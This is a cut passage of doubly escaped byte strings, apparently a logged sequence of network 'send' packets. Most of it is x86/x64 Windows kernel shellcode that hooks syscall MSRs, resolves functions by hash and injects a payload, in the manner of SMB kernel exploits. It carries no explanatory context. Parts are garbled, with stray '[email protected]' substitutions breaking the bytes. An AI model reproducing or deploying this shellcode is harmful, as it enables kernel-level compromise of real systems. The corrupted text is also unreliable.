f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 18, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\